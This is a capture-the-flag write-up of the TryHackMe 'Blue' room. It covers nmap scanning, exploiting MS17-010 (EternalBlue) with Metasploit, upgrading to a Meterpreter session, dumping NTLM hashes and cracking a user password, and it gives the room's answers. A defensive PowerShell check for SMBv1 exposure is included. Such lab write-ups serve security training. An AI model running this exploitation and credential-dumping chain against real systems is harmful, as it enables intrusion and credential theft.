TryHackMe : Blue

tryhackme Blue write-up

  • Name: Blue
  • Description: Deploy & hack into a Windows machine, leveraging common misconfiguration issues.
  • Room: tryhackme.com

[Task 1] Recon

Scan the machine

First we need to scan the machine to check for open ports and the services behind them:

sudo nmap -sS -A <machine_ip>

Question: How many ports are open with a port number under 1000?

Answer: 3

Question: What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)

“We can check the security problems of a device using scripts in Nmap, for example vuln script can identify common problems”

nmap <machine_ip> --script vuln

The vuln scripts report that the machine is vulnerable to ms17-010 (EternalBlue, the SMBv1 remote code execution bug).

Answer: ms17-010
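A defender-side counterpart to the scan above, added here and not part of the original write-up: a PowerShell check that reports whether a Windows host is still exposed to MS17-010 (fix missing or SMBv1 enabled) and a function that turns SMBv1 off. The KB ids assumed below are the Windows 7 SP1 / Server 2008 R2 updates from the MS17-010 bulletin; other builds use different ids, so take them from the bulletin for your version.

```powershell
# Added example, not from the original write-up. Run in an elevated PowerShell on the host.
# Assumption: these are the MS17-010 update ids for Windows 7 SP1 / Server 2008 R2 only.
$Ms17010Kbs = @('KB4012212', 'KB4012215')

function Test-Ms17010Exposure {
    $result = [ordered]@{}

    # 1. Is the MS17-010 fix installed? Any one of the listed updates contains it.
    $installed = Get-HotFix -ErrorAction SilentlyContinue |
        Where-Object { $Ms17010Kbs -contains $_.HotFixID }
    $result.Patched = [bool]$installed

    # 2. Is SMBv1 still enabled? EternalBlue only works against SMBv1, so disabling it
    #    closes the exposure even on an unpatched box. Windows 8/2012+ expose the setting
    #    through the SmbShare module; older builds through the LanmanServer registry value.
    if (Get-Command Get-SmbServerConfiguration -ErrorAction SilentlyContinue) {
        $result.Smb1Enabled = (Get-SmbServerConfiguration).EnableSMB1Protocol
    } else {
        $params = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
        $smb1 = Get-ItemProperty -Path $params -Name SMB1 -ErrorAction SilentlyContinue
        # An absent value means SMBv1 is on by default on these builds.
        $result.Smb1Enabled = ($null -eq $smb1) -or ($smb1.SMB1 -ne 0)
    }
    return $result
}

function Disable-Smb1 {
    if (Get-Command Set-SmbServerConfiguration -ErrorAction SilentlyContinue) {
        Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
    } else {
        $params = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
        # Documented Microsoft method for Windows 7 / 2008 R2; takes effect after a reboot.
        Set-ItemProperty -Path $params -Name SMB1 -Type DWord -Value 0 -Force
    }
}

$state = Test-Ms17010Exposure
[pscustomobject]$state | Format-List
if (-not $state.Patched -or $state.Smb1Enabled) {
    Write-Warning 'Host is exposed to MS17-010: install the update and run Disable-Smb1.'
}
```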

[Task 2] Gain Access

Start Metasploit

We know that the machine has a known vulnerability, and we can use Metasploit to exploit it:

msfconsole

The next step is to find the appropriate exploit module for the vulnerability (ms17-010):

search ms17-010

The module we want is the second result in the list, exploit/windows/smb/ms17_010_eternalblue.

Question: Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)

Answer: exploit/windows/smb/ms17_010_eternalblue

We have to select the desired exploit and set the required options:

use exploit/windows/smb/ms17_010_eternalblue

and

show options

Set the target machine IP:

set RHOSTS <machine_ip>

Question: Show options and set the one required value. What is the name of this value? (All caps for submission)

Answer: RHOSTS

Run the exploit with either of:

run or exploit

The exploit runs and we get a Windows command shell on the host. To continue, we need a Meterpreter session, which lets us execute commands and upload files.

[Task 3] Escalate

We need to turn the plain shell into a Meterpreter session. Background the current shell (with the background command or CTRL + Z):

background

and then load the post module that upgrades it:

use post/multi/manage/shell_to_meterpreter

Question: If you haven’t already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)

Answer: post/multi/manage/shell_to_meterpreter

List the sessions and set the session number of the shell we just backgrounded:

sessions -l

and

set SESSION 1

Question: Select this (use MODULE_PATH). Show options, what option are we required to change?

Answer: SESSION

Now if we list the sessions again, a second session of type meterpreter has been added:

sessions -l

sessions 2

We now have a Meterpreter session, which gives us an interactive shell on the target from which to explore the machine and execute code.

Use the ps command to list all processes running on the host:

ps

[Task 4] Cracking

Use hashdump to dump the local user credentials (NTLM hashes):

hashdump

Question: Within our elevated meterpreter shell, run the command ‘hashdump’. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?

Answer: Jon

https://crackstation.net/

Use the above link to look up the password hash, or crack it locally with hashcat or John the Ripper and the rockyou.txt wordlist.

Question: Copy this password hash to a file and research how to crack it. What is the cracked password?

Answer: alqfna22

[Task 5] Find flags!

Search for the flags from the Meterpreter session with:

search -f flag*.txt

thank you 🌏🔥

--

Hassan Mohammadi

Computer student and interested in programming and security